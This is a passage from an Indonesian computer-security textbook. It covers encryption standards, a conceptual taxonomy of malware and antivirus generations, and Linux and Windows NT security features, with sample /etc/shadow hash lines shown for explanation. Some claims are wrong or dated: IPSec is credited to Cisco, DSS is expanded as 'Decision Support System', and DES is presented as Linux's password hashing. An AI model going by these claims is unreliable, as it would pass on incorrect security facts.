karakter khusus, dalam contoh ini digunakan "&". Proses
yang terjadi untuk plaintext kita adalah :

Gambar 2.8. Enkripsi dengan Pemampatan

Aturan penghilangan karakter dan karakter khusus yang


berfungsi sebagai pemisah menjadi dasar untuk proses
dekripsi ciphertext menjadi plaintext kembali.

Keamanan Komputer 23
Dengan menggunakan kelima teknik dasar kriptografi diatas,
dapat diciptakan kombinasi teknik kriptografi yang amat banyak, dengan
faktor yang membatasi semata-mata hanyalah kreativitas dan imajinasi
kita. Walaupun sekilas terlihat sederhana, kombinasi teknik dasar
kriptografi dapat menghasilkan teknik kriptografi turunan yang cukup
kompleks, dan beberapa teknik dasar kriptografi masih digunakan dalam
teknik kriptografi modern.

2.9 Berbagai Solusi Enkripsi Modern

1. Data Encryption Standard (DES)


• standar bagi USA Government
• didukung ANSI dan IETF
• popular untuk metode secret key
• terdiri dari : 40-bit, 56-bit dan 3x56-bit (Triple DES)

2. Advanced Encryption Standard (AES)


• untuk menggantikan DES (launching akhir 2001)
• menggunakan variable length block chipper
• key length : 128-bit, 192-bit, 256-bit
• dapat diterapkan untuk smart card.

3. Digital Certificate Server (DCS)


• verifikasi untuk digital signature
• autentikasi user
• menggunakan public dan private key
• contoh : Netscape Certificate Server

4. IP Security (IPSec)
• enkripsi public/private key
• dirancang oleh CISCO System
• menggunakan DES 40-bit dan authentication
• built-in pada produk CISCO
• solusi tepat untuk Virtual Private Network (VPN) dan
Remote Network Access

5. Kerberos
• solusi untuk user authentication
• dapat menangani multiple platform/system

24 Keamanan Komputer
• free charge (open source)
• IBM menyediakan versi komersial : Global Sign On
(GSO)

6. Point to point Tunneling Protocol(PPTP), Layer Two Tunneling


Protocol (L2TP)
• dirancang oleh Microsoft
• autentication berdasarkan PPP(Point to point protocol)
• enkripsi berdasarkan algoritm Microsoft (tidak terbuka)
• terintegrasi dengan NOS Microsoft (NT, 2000, XP)

7. Remote Access Dial-in User Service (RADIUS)


• multiple remote access device menggunakan 1 database
untuk authentication
• didukung oleh 3com, CISCO, Ascend
• tidak menggunakan encryption

8. RSA Encryption
• dirancang oleh Rivest, Shamir, Adleman tahun 1977
• standar de facto dalam enkripsi public/private key
• didukung oleh Microsoft, apple, novell, sun, lotus
• mendukung proses authentication
• multi platform

9. Secure Hash Algoritm (SHA)


• dirancang oleh National Institute of Standard and
Technology (NIST) USA.
• bagian dari standar DSS(Decision Support System) USA
dan bekerja sama dengan DES untuk digital signature.
• SHA-1 menyediakan 160-bit message digest
• Versi : SHA-256, SHA-384, SHA-512 (terintegrasi
dengan AES)

10. MD5
• dirancang oleh Prof. Robert Rivest (RSA, MIT) tahun
1991
• menghasilkan 128-bit digest.
• cepat tapi kurang aman

Keamanan Komputer 25
11. Secure Shell (SSH)
• digunakan untuk client side authentication antara 2 sistem
• mendukung UNIX, windows, OS/2
• melindungi telnet dan ftp (file transfer protocol)

12. Secure Socket Layer (SSL)


• dirancang oleh Netscape
• menyediakan enkripsi RSA pada layes session dari model
OSI.
• independen terhadap servise yang digunakan.
• melindungi system secure web e-commerce
• metode public/private key dan dapat melakukan
authentication
• terintegrasi dalam produk browser dan web server
Netscape.

13. Security Token


• aplikasi penyimpanan password dan data user di smart
card

14. Simple Key Management for Internet Protocol


• seperti SSL bekerja pada level session model OSI.
• menghasilkan key yang static, mudah bobol.

2.10 Aplikasi Enkripsi

Beberapa aplikasi yang memerlukan enkripsi untuk pengamanan


data atau komunikasi diantaranya adalah :

a. Jasa telekomunikasi
• Enkripsi untuk mengamankan informasi konfidensial baik
berupa suara, data, maupun gambar yang akan dikirimkan ke
lawan bicaranya.
• Enkripsi pada transfer data untuk keperluan manajemen
jaringan dan transfer on-line data billing.
• Enkripsi untuk menjaga copyright dari informasi yang
diberikan.

26 Keamanan Komputer
b. Militer dan pemerintahan
• Enkripsi diantaranya digunakan dalam pengiriman pesan.
• Menyimpan data-data rahasia militer dan kenegaraan dalam
media penyimpanannya selalu dalam keaadan terenkripsi.

c. Data Perbankan
• Informasi transfer uang antar bank harus selalu dalam
keadaan terenkripsi

d. Data konfidensial perusahaan


• Rencana strategis, formula-formula produk, database
pelanggan/karyawan dan database operasional
• pusat penyimpanan data perusahaan dapat diakses secara on -
line.
• Teknik enkripsi juga harus diterapkan untuk data konfidensial
untuk melindungi data dari pembacaan maupun perubahan
secara tidak sah.

e. Pengamanan electronic mail


• Mengamankan pada saat ditransmisikan maupun dalam media
penyimpanan.
• Aplikasi enkripsi telah dibuat khusus untuk mengamankan e -
mail, diantaranya PEM (Privacy Enhanced Mail) dan PGP
(Pretty Good Privacy), keduanya berbasis DES dan RSA.

f. Kartu Plastik
• Enkripsi pada SIM Card, kartu telepon umum, kartu
langganan TV kabel, kartu kontrol akses ruangan dan
komputer, kartu kredit, kartu ATM, kartu pemeriksaan medis,
dll
• Enkripsi teknologi penyimpanan data secara magnetic, optik,
maupun chip.

Keamanan Komputer 27
BAB 3
KEAMANAN DARI MALICIOUS PROGRAM
3.1 Taksonomi ancaman perangkat lunak / klasifikasi program jahat
(malicious program):

1. Program-program yang memerlukan program inang (host


program). Fragmen program tidak dapat mandiri secara
independen dari suatu program aplikasi, program utilitas atau
program sistem.
2. Program-program yang tidak memerlukan program inang.
Program sendiri yang dapat dijadwalkan dan dijalankan oleh
sistem operasi.

Tujuan
1. Memahami klasifikasi malicious program (program jahat)
2. Mengetahui dan Memahami tipe-tipe malicious program
3. Mengetahui dan Memahami Anti Virus

3.2 Tipe-tipe program jahat :

1. Bacteria : program yang mengkonsumsi sumber daya sistem


dengan mereplikasi dirinya sendiri. Bacteria tidak secara eksplisit
merusak file. Tujuan program ini hanya satu yaitu mereplikasi
dirinya. Program bacteria yang sederhana bisa hanya
mengeksekusi dua kopian dirinya secara simultan pada sistem
multiprogramming atau menciptakan dua file baru, masing-
masing adalah kopian file program bacteria. Kedua kopia n in
kemudian mengkopi dua kali, dan seterusnya.

2. Logic bomb : logik yang ditempelkan pada program komputer


agar memeriksa suatu kumpulan kondisi di sistem. Ketika
kondisi-kondisi yang dimaksud ditemui, logik mengeksekusi
suatu fungsi yang menghasilkan aksi-aksi tak diotorisasi.
• Logic bomb menempel pada suatu program resmi yang diset
meledak ketika kondisi-kondisi tertentu dipenuhi.
• Contoh kondisi-kondisi untuk memicu logic bomb adalah ada
atau tudak adanya file-file tertentu, hari tertentu daru minggu

28 Keamanan Komputer
atau tanggal, atau pemakai menjalankan aplikasi tertentu.
Begitu terpicu, bomb mengubah atau menghapus data atau
seluruh file, menyebabkan mesin terhenti, atau mengerjakan
perusakan lain.

3. Trapdoor : Titik masuk tak terdokumentasi rahasia di satu


program untuk memberikan akses tanpa metode-metode
otentifikasi normal.
• Trapdoor telah dipakai secara benar selama bertahun -tahun
oleh pemogram untuk mencari kesalahan program. Debugging
dan testing biasanya dilakukan pemogram saat
mengembangkan aplikasi. Untuk program yang mempunyai
prosedur otentifikasi atau setup lama atau memerlukan
pemakai memasukkan nilai-nilai berbeda untuk menjalankan
aplikasi maka debugging akan lama bila harus melewati
prosedur-prosedur tersebut. Untuk debug program jenis ini,
pengembang membuat kewenangan khusus atau
menghilangkan keperluan setup dan otentifikasi.
• Trapdoor adalah kode yang menerima suatu barisan masukan
khusus atau dipicu dengan menjalankan ID pemakai tertentu
atau barisan kejahatan tertentu. Trapdoor menjadi ancaman
ketika digunakan pemrogram jahat untuk memperoleh
pengkasesan tak diotorisasi.
• Pada kasus nyata, auditor (pemeriks) perangkat lunak dapat
menemukan trapdoor pada produk perangkat lunak dimana
nama pencipta perangkat lunak berlakuk sebagai password
yang memintas proteksi perangkat lunak yang dibuatnya.
Adalah sulit mengimplementasikan kendali-kendali perangkat
lunak untuk trapdoor.

4. Trojan horse : Rutin tak terdokumentasi rahasia ditempelkan


dalam satu program berguna. Program yang berguna mengandung
kode tersembunyi yang ketika dijalankan melakukan suatu fungsi
yang tak diinginkan. Eksekusi program menyebabkan eksekusi
rutin rahasia ini.
• Program-program trojan horse digunakan untuk melakukan
fungsi-fungsi secara tidak langsung dimana pemakai tak
diotorisasi tidak dapat melakukannya secara langsung.
Contoh, untuk dapat mengakses file-file pemakai lain pada

Keamanan Komputer 29
sistem dipakai bersama, pemakai dapat menciptakan program
trojan horse.
• Trojan horse ini ketika program dieksekusi akan mengubah
ijin-ijin file sehinga file-file dapat dibaca oleh sembarang
pemakai. Pencipta program dapat menyebarkan ke pemakai -
pemakai dengan menempatkan program di direktori bersama
dan menamai programnya sedemikian rupa sehingga disangka
sebagai program utilitas yang berguna.
• Program trojan horse yang sulit dideteksi adalah kompilator
yang dimodifikasi sehingga menyisipkan kode tambahan ke
program-program tertentu begitu dikompilasi, seperti program
login. Kode menciptakan trapdoor pada program login yang
mengijinkan pencipta log ke sistem menggunakan password
khusus. Trojan horse jenis ini tak pernah dapat ditemukan jika
hanya membaca program sumber. Motivasi lain dari trojan
horse adalah penghancuran data. Program muncul sebagai
melakukan fungsi-fungsi berguna (seperti kalkulator), tapi
juga secara diam-diam menghapus file-file pemakai.
• Trojan horse biasa ditempelkan pada program-program atau
rutin-rutin yang diambil dari BBS, internet, dan sebagainya.

5. Virus : Kode yang ditempelkan dalam satu program yang


menyebabkan pengkopian dirinya disisipkan ke satu program lain
atau lebih, dengan cara memodifikasi program-program itu.
• Modifikasi dilakukan dengan memasukkan kopian program
virus yang dapat menginfeksi program-program lain. Selain
hanya progasi, virus biasanya melakukan fungsi yang ta k
diinginkan.
• Di dalam virus komputer, terdapat kode intruksi yang dapat
membuat kopian sempurna dirinya. Ketika komputer yang
terinfeksi berhubungan (kontak) dengan perangkat lunak yang
belum terinfeksi, kopian virus memasuki program baru.
Infeksi dapat menyebar dari komputer ke komputer melalui
pemakai-pemakai yang menukarkan disk atau mengirim
program melalui jaringan. Pada lingkungan jaringan,
kemampuan mengakses aplikasi dan layanan-layanan
komputer lain merupakan fasilitas sempurna penyebaran
virus.

30 Keamanan Komputer
• Masalah yang ditimbulkan virus adalah virus sering merusak
sistem komputer seperti menghapus file, partisi disk, atau
mengacaukan program.
• Siklus hidup Virus melalui empat fase (tahap), yaitu :
 Fase tidur (dormant phase). Virus dalam keadaan
menganggur. Virus akan tiba-tiba aktif oleh suatu
kejadian seperti tibanya tanggal tertentu, kehadiran
program atau file tertentu, atau kapasitas disk yang
melewati batas. Tidak semua virus mempunyai tahap
ini.
 Fase propagasi (propagation phase). Virus menempatkan
kopian dirinya ke program lain atau daerah sistem
tertentu di disk. Program yang terinfeksi virus akan
mempunyai kloning virus. Kloning virus itu dapat
kembali memasuki fase propagasi.
 Fase pemicuan (triggering phase). Virus diaktifkan
untuk melakukan fungsi tertentu. Seperti pada fase tidur,
fase pemicuan dapat disebabkan beragam kejadian
sistem termasuk penghitungan jumlah kopian dirinya.
 Fase eksekusi (execution phase). Virus menjalankan
fungsinya, fungsinya mungkin sepele seperti sekedar
menampilkan pesan dilayar atau merusak seperti
merusak program dan file-file data, dan sebagainya.
Kebanyakan virus melakukan kerjanya untuk suatu
sistem operasi tertentu, lebih spesifik lagi pada platform
perangkat keras tertentu. Virus-virus dirancang
memanfaatkan rincian-rincian dan kelemahan-
kelemahan sistem tertentu.

• Klasifikasi tipe virus :


a. Parasitic virus. Merupakan virus tradisional dan bentuk
virus yang paling sering. Tipe ini mencantolkan dirinya ke
file .exe. Virus mereplikasi ketika program terinfeksi
dieksekusi dengan mencari file-file .exe lain untuk
diinfeksi.
b. Memory resident virus. Virus memuatkan diri ke memori
utama sebagai bagian program yang menetap. Virus
menginfeksi setiap program yang dieksekusi.

Keamanan Komputer 31
c. Boot sector virus. Virus menginfeksi master boot record
atau boot record dan menyebar saat sistem diboot dari disk
yang berisi virus.
d. Stealth virus. Virus yang bentuknya telah dirancang agar
dapat menyembunyikan diri dari deteksi perangkat lunak
antivirus.
e. Polymorphic virus. Virus bermutasi setiap kali melakukan
infeksi. Deteksi dengan penandaan virus tersebut tidak
dimungkinkan. Penulis virus dapat melengkapi dengan
alat-alat bantu penciptaan virus baru (virus creation
toolkit, yaitu rutin-rutin untuk menciptakan virus-virus
baru). Dengan alat bantu ini penciptaan virus baru dapat
dilakukan dengan cepat. Virus-virus yang diciptakan
dengan alat bantu biasanya kurang canggih dibanding
virus-virus yang dirancang dari awal.

6. Worm: Program yang dapat mereplikasi dirinya dan mengirim


kopian-kopian dari komputer ke komputer lewat hubungan
jaringan. Begitu tiba, worm diaktifkan untuk mereplikasi dan
progasai kembali. Selain hanya propagasi, worm biasanya
melakukan fungsi yang tak diinginkan.
• Network worm menggunakan hubungan jaringan untuk
menyebar dari sistem ke sistem lain. Sekali aktif di suatu
sistem, network worm dapat berlaku seperti virus atau
bacteria, atau menempelkan program trojan horse atau
melakukan sejumlah aksi menjengkelkan atau
menghancurkan.
• Untuk mereplikasi dirinya, network worm menggunakan
suatu layanan jaringan, seperti : Fasilitas surat elektronik
(electronic mail facility), yaitu worm mengirimkan kopian
dirinya ke sistem-sistem lain.
• Kemampuan eksekusi jarak jauh (remote execution
capability), yaitu worm mengeksekusi kopian dirinya di
sistem lain.
• Kemampuan login jarak jauh (remote login capability), yaitu
worm log pada sistem jauh sebagai pemakai dan kemudian
menggunakan perintah untuk mengkopi dirinya dari satu
sistem ke sistem lain. Kopian program worm yang baru
kemudian dijalankan di sistem jauh dan melakukan fungsi-

32 Keamanan Komputer
fungsi lain yang dilakukan di sistem itu, worm terus menyebar
dengan cara yang sama.
• Network worm mempunyai ciri-ciri yang sama dengan virus
komputer, yaitu mempunyai fase-fase sama, yaitu : Dormant
phase, Propagation phase, Trigerring phase, Execution phase.
• Network worm juga berusaha menentukan apakah sistem
sebelumnya telah diinfeksi sebelum mengirim kopian dirinya
ke sistem itu.

3.3 Antivirus

Solusi ideal terhadap ancaman virus adalah pencegahan. Jaringan


diijinkan virus masuk ke sistem. Sasaran ini, tak mungkin dilaksanakan
sepenuhnya. Pencegahan dapat mereduksi sejumlah serangan virus.
Setelah pencegahan terhadap masuknya virus, maka pendekatan
berikutnya yang dapat dilakukan adalah :

1. Deteksi. Begitu infeksi telah terjadi, tentukan apakah infeksi


memang telah terjadi dan cari lokasi virus.

2. Identifikasi. Begitu virus terdeteksi maka identifikasi virus yang


menginfeksi program.

3. Penghilangan. Begitu virus dapat diidentifikasi maka hilangkan


semua jejak virus dari program yang terinfeksi dan program
dikembalikan ke semua (sebelum terinfeksi). Jika deteksi virus
sukses dilakukan, tapi identifikasi atau penghilangan jejak tidak
dapat dilakukan, maka alternatif yang dilakukan adalah
menghapus program yang terinfeksi dan kopi kembali backup
program yang masih bersih.

Perkembangan program antivirus dapat diperiode menjadi empat


generasi, yaitu :

1. Generasi pertama : sekedar scanner sederhana. Antivirus menscan


program untuk menemukan penanda (signature) virus. Walaupun
virus mungkin berisi karakter-karakter varian, tapi secara esensi
mempunyai struktur dan pola bit yang sama di semua kopiannya.
Teknis ini terbatas untuk deteksi virus-virus yang telah dikenal.
Keamanan Komputer 33
Tipe lain antivirus generasi pertama adalah mengelola rekaman
panjang (ukuran) program dan memeriksa perubahan panjang
program.

2. Generasi kedua : scanner yang pintar (heuristic scanner).


Antivirus menscan tidak bergantung pada penanda spesifik.
Antivirus menggunakan aturan-aturan pintar (heuristic rules) untuk
mencari kemungkinan infeksi virus.Teknik yang dipakai misalnya
mencari fragmen- fragmen kode yang sering merupakan bagian
virus. Contohnya, antivirus mencari awal loop enkripsi yang
digunakan polymorphic virus dan menemukan kunci enkripsi.
Begitu kunci ditemukan, antivirus dapat mendeskripsi virus untuk
identifikasi dan kemudian menghilangkan infeksi virus. Teknik ini
adalah pemeriksanaan integritas. Checksum dapat ditambahkan di
tiap program. Jika virus menginfeksi program tanpa mengubah
checksum, maka pemeriksaan integritas akan menemukan
perubahan itu. Untuk menanggulangi virus canggih yang mampu
mengubah checksum saat menginfeksi program, fungsi hash
terenkripsi digunakan. Kunci enkripsi disimpan secara terpisah dari
program sehingga program tidak dapat menghasilkan kode hash
baru dan mengenkripsinya. Dengan menggunakan fungsi hash
bukan checksum sederhana maka mencegah virus menyesuaikan
program yang menghasilkan kode hash yang sama seperti
sebelumnya.

3. Generasi ketiga : jebakan-jebakan aktivitas (activity trap).


Program antivirus merupakan program yang menetap di memori
(memory resident program). Program ini mengidentifikasi virus
melalui aksi- aksinya bukan dari struktur program yang diinf eksi.
Dengan antivirus semacam in tak perlu mengembangkan penanda-
penanda dan aturan-aturan pintar untuk beragam virus yang sangat
banyak. Dengan cara ini yang diperlukan adalah mengidentif ikasi
kumpulan instruksi yang berjumlah sedikit yang mengidentif ikasi
adanya usaha infeksi. Kalau muncul kejadian ini, program antivirus
segera mengintervensi.

4. Generasi keempat : proteksi penuh (full featured protection).


Antivirus generasi ini menggunakan beragam teknik antivirus
secara bersamaan. Teknik-teknik ini meliputi scanning dan
jebakan-jebakan aktivitas. Antivirus juga mempunyai senarai
34 Keamanan Komputer
kapabilitas pengaksesan yang membatasi kemampuan virus
memasuki sistem dan membatasi kemampuan virus memodif ikasi
file untuk menginfeksi file. Pertempuran antara penulis virus dan
pembuat antivirus masih berlanjut. Walau beragam strategi lebih
lengkap telah dibuat untuk menanggulangi virus, penulis virus pun
masih berlanjut menulis virus yang dapat melewati barikade -
barikade yang dibuat penulis antivirus. Untuk pengaman sistem
komputer, sebaiknya pengaksesandan pemakaian komputer diawasi
dengan seksama sehingga tidak menjalankan program atau
memakai disk yang belum terjamin kebersihannya dari infeksi
virus. Pencegahan terbaik terhadap ancaman virus adalah
mencegah virus memasuki sistem disaat yang pertama.

Keamanan Komputer 35
BAB 4
KEAMANAN SISTEM OPERASI
4.1. Pengertian Sistem Operasi

Sistem operasi (bahasa Inggris: operating system ; OS) adalah


komponen pengolah piranti lunak dasar (essential component) tersistem
sebagai pengelola sumber daya perangkat keras komputer (hardware),
dan menyediakan layanan umum untuk aplikasi perangkat lunak.

Sistem Operasi secara umum terdiri dari beberapa bagian:


• Mekanisme Boot, yaitu meletakkan kernel ke dalam memory
• Kernel, yaitu inti dari sebuah Sistem Operasi
• Command Interpreter atau shell, yang bertugas membaca input
dari pengguna
• Pustaka-pustaka, yaitu yang menyediakan kumpulan fungsi dasar
dan standar yang dapat dipanggil oleh aplikasi lain
• Driver untuk berinteraksi dengan hardware eksternal, sekaligus
untuk mengontrolnya.

36 Keamanan Komputer
Tujuan
1. Memahami Sistem Operasi beserta Keamanannya
2. Mengetahui dan Memahami Keamanan Sistem Operasi Linux
3. Mengetahui dan Memahami Keamanan Sistem Operasi Windows

4.2 Linux

Linux adalah salah satu Software Sistem Operasi yang bersifat


Open Source.

4.2.1 Komponen Arsitektur Keamanan Linux :

1. Account Pemakai (user account)

Keuntungan :
• Kekuasaan dalam satu account yaitu root, sehingga mudah dalam
administrasi system.
• Kecerobohan salah satu user tidak berpengaruh kepada system
secara keseluruhan.
• Masing-masing user memiliki privacy yang ketat

Macam User :
• Root : kontrol system file, user, sumber daya (devices) dan
akses jaringan
• User : account dengan kekuasaan yang diatur oleh root dalam
melakukan aktifitas dalam system.
• Group : kumpulan user yang memiliki hak sharing yang sejenis
terhadap suatu devices tertentu.

2. Kontrol Akses secara Diskresi (Discretionary Access control)

Discretionary Access control (DAC) adalah metode pembatasan yang


ketat, yang meliputi :
• Setiap account memiliki username dan password sendiri.
• Setiap file/device memiliki atribut(read/write/execution)
kepemilikan, group, dan user umum.

Keamanan Komputer 37
Virus tidak akan mencapai file system, jika sebuah user
terkena, maka akan berpengaruh pada file-file yang
dimiliki oleh user yang mengeksekusi file tersebut.

Jika kita lakukan list secara detail menggunakan $ls –l, kita dapat melihat
penerapan DAC pada file system linux :

d rw- - -x - - - 5 f ade users 1024 Feb 8 12:30 Desktop


- rw- r - - r - - 9 Goh hack 318 Mar 30 09:05 borg.dead.letter

- rw- r-- r-- 9 Goh hack 318 Mar 30 09:05 borg.dead.letter


1 2 3 4 5 6 7 8 9 10 11

Keterangan :
1 = tipe dari file ; tanda dash ( - ) berarti 5= Jumlah link file
file biasa, d berarti directory, l berarti 6= Nama pemilik (owner)
file link, dsb 7= Nama Group
2 = Izin akses untuk owner (pemilik), 8= Besar file dalam byte
r=read/baca, w=write/tulis, 9= Bulan dan tanggal update terakhir
x=execute/eksekusi 10 = Waktu update terakhir
3 = Izin akses untuk group 11 = Nama file/device
4 = Izin akses untuk other (user lain yang
berada di luar group yang didefinisikan
sebelumnya)

Perintah-perintah penting pada DAC :

1 Mengubah izin akses file :


- bu : chmod < u | g | o > < + | - > < r | w | e > nama file,
contoh :
chmod u+x g+w o-r borg.dead.letter ; tambahkan akses eksekusi(e)
untuk user (u), tambahkan juga akses write(w) untuk group (g) dan
kurangi izin akses read(r) untuk other(o) user.
- chmod metode octal, bu: chmod - - - namafile , digit dash ( - ) pertama
untuk izin akses user, digit ke-2 untuk izin akses group dan digit ke-3
untuk izin akses other, berlaku ketentuan : r(read) = 4, w(write) = 2, x
(execute) = 1 dan tanpa izin akses = 0.
Contoh :
Chmod 740 borg.dead.letter
Berarti : bagi file borg.dead.letter berlaku

38 Keamanan Komputer
digit ke-1 → 7=4+2+1=izin akses r,w,x penuh untuk user.
digit ke-2 → 4=4+0+0=izin akses r untuk group
digit ke-3 → 0=0+0+0=tanpa izin akses untuk other user.

2. Mengubah kepemilikan : chown <owner/pemilik><nama file>


3. Mengubah kepemilikan group : chgrp <group owner><nama file>
4. Menggunakan account root untuk sementara :
~$su ; system akan meminta password
password : **** ; prompt akan berubah jadi pagar, tanda login sebagai
root
~#
5. Mengaktifkan shadow password, yaitu membuat file /etc/passwd
menjadi dapat dibaca (readable) tetapi tidak lagi berisi password, karena
sudah dipindahkan ke /etc/shadow

Contoh tipikal file /etc/passwd setelah diaktifkan shadow:



root:x:0:0::/root:/bin/bash
f ade:x:1000:103: , , , :/home/fade:/bin/bash

Lihat user fade, dapat kita baca sebagai berikut :

username : fade
Password :x
User ID (UID) : 1000
Group ID (GUID) : 103
Keterangan tambahan :-
Home directory : /home/fade
Shell default : /bin/bash

Password-nya bisa dibaca (readable), tapi berupa huruf x saja, password


sebenarnya disimpan di file /etc/shadow dalam keadaan dienkripsi :

root:pCfouljTBTX7o:10995:0:::::
f ade:oiHQw6GBf4tiE:10995:0:99999:7:::

3. Perlunya Pro aktif password

Linux menggunakan metode DES (Data Encription Standart) untuk


password-nya. User harus di training dalam memilih password yang akan
digunakannya agar tidak mudah ditebak dengan program-program crack

Keamanan Komputer 39
password dalam ancaman bruto force attack. Dan perlu pula ditambah
dengan program Bantu cek keamanan password seperti :
1. Passwd+ : meningkatkan loging dan mengingatkan user jika
mengisi password yang mudah ditebak,
ftp://ftp.dartmouth.edu/pub/security
2. Anlpasswd : dapat membuat aturan standar pengisian
password seperti batas minimum, gabungan huruf besar dengan
huruf kecil, gabungan angka dan huruf dsb,
ftp://coast.rs.purdue.edu/pub/tools/unix/

4. Kontrol akses jaringan (Network Access Control)

Firewall linux:
Alat pengontrolan akses antar jaringan yang membuat linux dapat
memilih host yang berhak / tidak berhak mengaksesnya.

Fungsi Firewall linux :


• Analisa dan filtering paket
Memeriksa paket TCP, lalu diperlakukan dengan kondisi yang sudah
ditentukan, contoh paket A lakukan tindakan B.
• Blocking content dan protocol
Bloking isi paket seperti applet java, activeX, Vbscript, Cookies
• Autentikasi koneksi dan enkripsi
Menjalankan enkripsi dalam identitas user, integritas satu session dan
melapisi data dengan algoritma enkripsi seperti : DES, triple DES,
Blowfish, IPSec, SHA, MD5, IDEA, dsb.

Tipe firewall linux :


• Application-proxy firewall/Application Gateways
Dilakukan pada level aplikasi di layer OSI, system proxy ini
meneruskan / membagi paket-paket ke dalam jaringan internal.
Contoh : software TIS FWTK (Tursted Information System Firewall
Toolkit)
• Network level Firewall, fungsi filter dan bloking paket dilakukan di
router. Contoh : TCPWrappers, aplikasinya ada di /usr/sbin/tcpd.
Cara kerjanya :
Lihat isi file /etc/inetd.conf :
...
telnet stream tcp nowait root /usr/sbin/telnetd

40 Keamanan Komputer
shell stream tcp nowait root /usr/sbin/rshd
pop3 stream tcp nowait root /usr/sbin/pop3d

dengan diaktifkan TCPwrappers maka isi file /etc/inetd.conf :


...
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L
pop3 stream tcp nowait root /usr/sbin/tcpd in.pop3d

setiap ada permintaan layanan jarak jauh, dipotong dulu dengan


pencocokan rule set yang telah diatur oleh tcp in, jika memenuhi
syarat diteruskan ke file yang akan diekseskusi, tapi jika tidak
memenuhi syarat digagalkan.

Pengaturan TCPWrapper dilakukan dengan mengkonfigurasi 2 file,


yaitu :
• /etc/host.allow → host yang diperbolehkan mengakses.
• /etc/host.deny → host yang tidak diperbolehkan mengakses.

5. Enkripsi (encryption)

Penerapan Enkripsi di linux :


• Enkripsi password → menggunakan DES ( Data Encryption
Standard )
• Enkripsi komunikasi data :
1. Secure Shell (SSH) → Program yang melakukan loging terhadap
komputer lain dalam jaringan, mengeksekusi perintah lewat mesin
secara remote dan memindahkan file dari satu mesin ke mesin
lainnya. Enkripsi dalam bentuk Blowfish, IDEA, RSA, Triple
DES. Isi SSH Suite :
• scp (secure shell copy) → mengamankan penggandaan
data
• ssh (secure shell client) → model client ssh seperti telnet
terenkripsi.
• ssh-agent → otentikasi lewat jaringan dengan model RSA.
• sshd (secure shell server) → di port 22
• ssh-keygen → pembuat kunci (key generator) untuk ssh

Keamanan Komputer 41
Konfigurasi dilakukan di :
• /etc/sshd_config (file konfigurasi server)
• /etc/ssh_config (file konfigurasi client)
2. Secure socket Layer (SSL) → mengenkripsi data yang
dikirimkan lewat port http.
Konfigurasi dilakukan di : web server APACHE dengan ditambah
PATCH SSL.

6. Logging

Def : Prosedur dari Sistem Operasi atau aplikasi merekam setiap kejadian
dan menyimpan rekaman tersebut untuk dapat dianalisa.

Semua file log linux disimpan di directory /var/log, antara lain :

• Lastlog : rekaman user login terakhir kali


• last : rekaman user yang pernah login dengan mencarinya pada f ile
/var/log/wtmp
• xferlog : rekaman informasi login di ftp daemon berupa data wktu
akses, durasi transfer file, ip dan dns host yang mengakses,
jumlah/nama file, tipe transfer(binary/ASCII), arah
transfer(incoming/outgoing), modus akses(anonymous/guest/user
resmi), nama/id/layanan user dan metode otentikasi.
• Access_log : rekaman layanan http / webserver.
• Error_log : rekaman pesan kesalahan atas service http / webserver
berupa data jam dan waktu, tipe/alasan kesalahan
• Messages : rekaman kejadian pada kernel ditangani oleh dua daemon
:
o Syslog → merekam semua program yang dijalankan, konfigurasi
pada syslog.conf
o Klog → menerima dan merekam semua pesan kernel

7. Deteksi Penyusupan (Intrusion Detection)

Def : aktivitas mendeteksi penyusupan secara cepat dengan


menggunakan program khusus secara otomatis yang disebut Intrusion
Detection System

42 Keamanan Komputer
Tipe dasar IDS :
• Ruled based system : mencatat lalu lintas data jika sesuai dengan
database dari tanda penyusupan yang telah dikenal, maka langsung
dikategorikan penyusupan. Pendekatan Ruled based system :
o Preemptory (pencegahan) ; IDS akan memperhatikan semua
lalu lintas jaringan, dan langsung bertindak jika dicurigai ada
penyusupan.
o Reactionary (reaksi) ; IDS hanya mengamati file log saja.
• Adaptive system : penerapan expert system dalam mengamati lalu
lintas jaringan.

Program IDS :
• Chkwtmp : program pengecekan terhadap entry kosong
• Tcplogd : program pendeteksi stealth scan (scanning yang
dilakukan tanpa membuat sesi tcp)
• Host entry : program pendeteksi login anomaly (perilaku aneh)
→ bizarre behaviour (perilaku aneh), time anomalies (anomaly
waktu), local anomaly.

4.3 Windows NT

Komponen Arsitektur Keamanan NT :

1. Adminisrasi User dan Group

Jenis Account User :


• Administrator
• Guest
• User

Jenis Account Gorup :


• Administrator
• Guest
• User
• Operator back-up
• Power user
• Operator server
• Operator account
• Operator printer

Keamanan Komputer 43
Hak User / Grup :
• Hak basic : acces computer from network, back-up files/directory,
change system time, logon locally, manage auditing and security, log
(event viewer), restore files and directory, shutdown system, take
ownership files or other object, dll.
• Hak advance : access service and kernel untuk kebutuhan
pengembangan system.

2. Keamanan untuk system File

A. NTFS :
• Cepat dalam operasi standar file (read – write – search)
• Terdapat system file recovery, access control dan permission.
• Memandang obyek sebagai kumpulan atribut, termasuk permission
access.

B. Proteksi untuk integritas data

Transaction logging : merupakan system file yang dapat di-recovery


untuk dapat mencatat semua perubahan terakhir pada directory dan f ile
secara otomatis.
• Jika transaksi system berhasil NT akan melakukan pembaharuan
pada file.
• Jika transaksi gagal, NT akan melalui :
• Tahap analisis : mengukur kerusakan dan menentukan lokasi
cluster yang harus diperbarui per informasi dalam file log.
• Tahap redo : melakukan semua tahapan transaksi yang dicatat
pada titik periksa terakhir
• Tahap undo : mengembalikan ke kondisi semula untuk semua
transaksi yang belum selesai dikerjakan.

Sector sparing : Teknik dynamic data recovery yang hanya terdapat


pada disk SCSI dengan cara memanfaatkan teknologi fault-tolerant
volume untuk membuat duplikat data dari sector yang mengalami err or.
Metodenya adalah dengan merekalkulasi dari stripe set with parity atau
dengan membaca sector dari mirror drive dan menulis data tersebut ke
sektor baru.

44 Keamanan Komputer
Cluster remapping : Jika ada kegagalan dalam transaksi I/O pada disk ,
secara otomatis akan mencari cluster baru yang tidak rusak, lalu
menandai alamat cluster yang mengandung bad sector tersebut.

C. Fault tolerance : Kemampuan untuk menyediakan redudansi data


secara realtime yang akan memberikan tindakan penyelamatan bila
terjadi kegagalan perangkat keras, korupsi perangkat lunak dan
kemungkinan masalah lainnya.
Teknologinya disebut RAID (Redudant Arrays of inexpensive Disk) :
sebuah array disk dimana dalam sebuah media penyimpanan terdapat
informasi redudan tentang data yang disimpan di sisa media tersebut.
Kelebihan RAID :
• Meningkatkan kinerja I/O
• meningkatkan reabilitas media penyimpanan

Ada 2 bentuk fault tolerance :


